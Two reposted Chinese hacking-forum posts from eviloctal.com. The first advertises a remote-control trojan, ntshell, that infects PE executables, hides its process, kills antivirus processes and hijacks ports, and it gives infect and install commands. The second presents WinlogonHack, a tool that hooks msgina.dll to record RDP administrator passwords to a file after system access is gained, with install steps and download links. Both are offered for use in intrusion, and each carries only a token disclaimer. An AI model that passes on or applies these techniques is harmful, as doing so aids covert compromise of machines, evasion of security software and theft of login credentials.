软件作者：被诅咒的神
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
这是一个免费开源的远程控制软件，源码仅供学习参考，请勿用于非法用途。
功能特点：
1.提供CMDSHELL、文件管理、进程管理、端口代理（未完成）、屏幕捕获和一些其它功能
2.可感染32位PE文件，感染后可选择在宿主进程空间中运行（无进程）或创建新进程运行，
在宿主进程中运行还可选择端口劫持，即复用宿主所打开的端口，感染不影响宿主正常运行
3.用到了一些内核技术，包括活动进程链脱链（隐藏进程），与ICESWORD相同的进程强杀方
法（能杀掉一些杀毒软件的进程），Ring0打开文件（用于感染正在运行的可执行文件），
2000/xp下采用无驱Ring0
4.同时支持正向连接和反向连接，服务端和控制端均可接受管理多个连接
感染文件方法：ntshell.exe -infect C:\test.exe
ntshell.exe先用生成服务端生成
安装成系统服务：ntshell.exe -install
服务移除：ntshell.exe -remove
代码编译环境：Windows XP SP2 + VC6.0
服务端采用纯C编写，VC直接编译
控制端为C++和WTL，需在VC中加入WTL支持才能编译



如果您发现BUG或是有什么好的建议，请发送mail给我：ktwyz#163.com
注：由于没时间做兼容性测试，一些内核操作可能导致系统蓝屏，测试前请先保存好数据
注2：该版本尚未加入驱动支持，故暂时无法在2003下使用Ring0的全部功能
下载地址： 2007-12-31.rar

Popularity: 82% [?]

文章作者：lovemfc
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

在得到system权限下，通常希望得到3389管理员密码，来进一步得到更多的信息，方便进一步的渗透。
gina木马比较不错，但是貌似win 2000少导出一个函数，用在win 2000下可能崩溃。
于是写了一个小工具，通过挂钩 msgina.dll WlxLoggedOutSAS 函数，记录登录帐户密码！
启动就用winlogon 通知包，当有3389，连上服务器时。新创建的 winlogon.exe 会在登录前加载，注册了 "Startup" 的dll，Hook 了函数，登录成功后，记录密码到 boot.dat 文件，并取消Hook。退出3389后，dll 文件即可删除。
详细代码及工具，见附件。
截图

理论上只要msgina.dll WlxLoggedOutSAS 前五个字节 为
mov edi,edi
push ebp
mov ebp,esp
就可以通过！
测试过 xp , 2003 。没有测试过 2000 。希望哪位朋友测试下，希望能做到服务器通杀！
有bug的Q我，343789385

WinlogonHack
一。执行install.bat 安装。
不用重启, 当有3389登上时，自动加载DLL，并且记录登录密码！ 保存为boot.dat文件.
二。运行ReadLog.bat 移动密码文件到当前目录。查看吧～
三。执行Uninstall.bat，若 %systemroot%\system32\wminotify.dll 文件未能删除，那就重启再删了吧，润物细无声~~~

工具： WinlogonHack.rar (17 K)
代码： source.rar (11 K)

Popularity: 84% [?]